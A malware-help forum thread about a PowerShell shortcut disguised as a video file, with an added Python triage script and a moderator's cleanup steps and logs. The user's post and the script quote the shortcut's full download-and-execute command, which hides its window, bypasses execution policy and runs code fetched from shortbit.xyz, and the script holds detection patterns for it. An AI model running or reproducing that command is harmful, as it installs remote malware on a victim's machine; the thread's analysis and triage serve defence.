I opened a malicious PowerShell shortcut



I downloaded what I thought was a video file, and after I tried to open it twice I realized it was actually a PowerShell shortcut with the following parameters: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB

 

I immediately ran virus scans with Windows Defender, Malwarebytes and Kaspersky VRT, but they didn't catch anything. I checked Event Viewer and it has logged multiple events in PowerShell and Security within a few seconds of the shortcut being run, so I know it did something or at least tried to do something, and I just want to be sure that my computer is safe.

 

I ran the shortcut at 2019-04-10 04:02, and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the Adobe logo as its icon, so it's definitely not legit. It seems the anti-virus programs didn't catch it and it's still on my system. What should I do with it?

It also created several user permission groups and I have no idea how to get rid of them.

FRST.txt Addition.txt

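As an added triage example (not part of the thread or any of the tools mentioned in it), the script below takes a shortcut argument string like the one quoted above, decodes the base64 literal, resolves the sal alias to see what the final command really is, and flags the indicators a defender would look for in process-creation or script-block logs. The sample command line is the one from the post; the indicator names and the verdict threshold are my own.

```python
import base64
import re

# Constructed sample: the shortcut arguments quoted in the post above.
SAMPLE_ARGS = (
    "-Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('aWV4'));sal ext $Lti;"
    "$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB"
)

# Patterns a defender looks for in PowerShell command-line telemetry (Event ID 4688 / 4104).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "hidden_window": re.compile(r"-windo(?:wstyle)?\s+(?:1|hidden)", re.I),
    "base64_decode": re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)"),
    "download_cradle": re.compile(r"DownloadString\('([^']+)'\)", re.I),
}
# "$var=...FromBase64String('...')" assigns decoded text; "sal <alias> $var" aliases it.
ASSIGN_B64 = re.compile(r"\$(\w+)=[^;]*?FromBase64String\('([A-Za-z0-9+/=]+)'\)")
SET_ALIAS = re.compile(r"\bsal\s+(\w+)\s+\$(\w+)", re.I)

def decode_b64(literal):
    """Decode a base64 literal to text; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def resolve_aliases(cmd):
    """Map each 'sal' alias to the decoded text of the variable it points at."""
    variables = {var: decode_b64(lit) for var, lit in ASSIGN_B64.findall(cmd)}
    return {alias: variables.get(var) for alias, var in SET_ALIAS.findall(cmd)}

def triage(cmd):
    """Return matched indicators, resolved aliases, URLs and a verdict for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    aliases = resolve_aliases(cmd)
    # 'sal ext $Lti' turns 'ext' into Invoke-Expression once $Lti decodes to 'iex'.
    if any((v or "").lower() in ("iex", "invoke-expression") for v in aliases.values()):
        hits.append("aliased_invoke_expression")
    return {
        "indicators": hits,
        "aliases": aliases,
        "urls": INDICATORS["download_cradle"].findall(cmd),
        "verdict": "malicious" if "download_cradle" in hits and len(hits) >= 3 else "review",
    }

if __name__ == "__main__":
    print(triage(SAMPLE_ARGS))
```

The resolved alias shows that the harmless-looking `ext $wbB` at the end is Invoke-Expression over whatever the remote server returned, which is why the shortcut leaves no malicious file of its own for a scanner to find.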

  • Root Admin

Hello @markb94 and welcome

 

Please run the following steps and post back the logs as an attachment when ready.

STEP 01

  • If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • If you don't have Malwarebytes 3 installed yet please download it from here and install it.
  • Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply.
  • If Malwarebytes won't run then please skip to the next step and let me know on your next reply.

STEP 02

Please download AdwCleaner by Malwarebytes and save the file to your Desktop.

  • Right-click on the program and select Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan Now.
  • When finished, please click Clean & Repair.
  • Your PC should reboot now if any items were found.
  • After reboot, a log file will be opened. Copy its content into your next reply.

 

RESTART THE COMPUTER Before running Step 3

STEP 03
Please download the Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit

  • Double-click to run it. When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). If you've run the tool before, you need to place a check mark here.
  • Please attach the Addition.txt log to your reply as well.

 

Thanks

Ron

 


Hi Ron, thanks for helping me out.

After targeting the file with Windows Defender, it did detect it as a virus and removed it, but just to be sure my computer isn't still infected, here are the results from following the steps:

 

# -------------------------------
# Malwarebytes AdwCleaner 7.3.0.0
# -------------------------------
# Build:    04-04-2019
# Database: 2019-04-08.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    04-10-2019
# Duration: 00:00:01
# OS:       Windows 10 Pro
# Cleaned:  9
# Failed:   1


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKCU\Software\csastats

***** [ Chromium (and derivatives) ] *****

Deleted       Amazon Assistant for Chrome

***** [ Chromium URLs ] *****

Deleted       AVG Secure Search
Deleted       Search Here
Deleted       Search The Web (privitize)
Deleted       Search The Web (privitize)
Deleted       Web Search
Deleted       WebSearch
Deleted       banggood.com
Not Deleted   Search Here

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1650 octets] - [10/04/2019 09:13:25]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

 

FRST.txt Addition.txt log.txt


  • Root Admin

You look to be running 2 antivirus programs, Bitdefender and Kaspersky. Please choose one and uninstall the other one to prevent conflicts.

Aside from a couple of ADS entries, the computer does not appear to be infected.


AlternateDataStreams: C:\Users\markw\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\markw\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]


I would remove one of the antivirus programs as I said above and reboot. Then update the antivirus that is left and run a scan with it too.

Please note the following from a recent Windows 10 update:

Sophos Central Endpoint and SEC: Computers fail/hang on boot after the Microsoft Windows April 9, 2019 update

https://community.sophos.com/kb/en-us/133945

 

 


  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Thanks

 
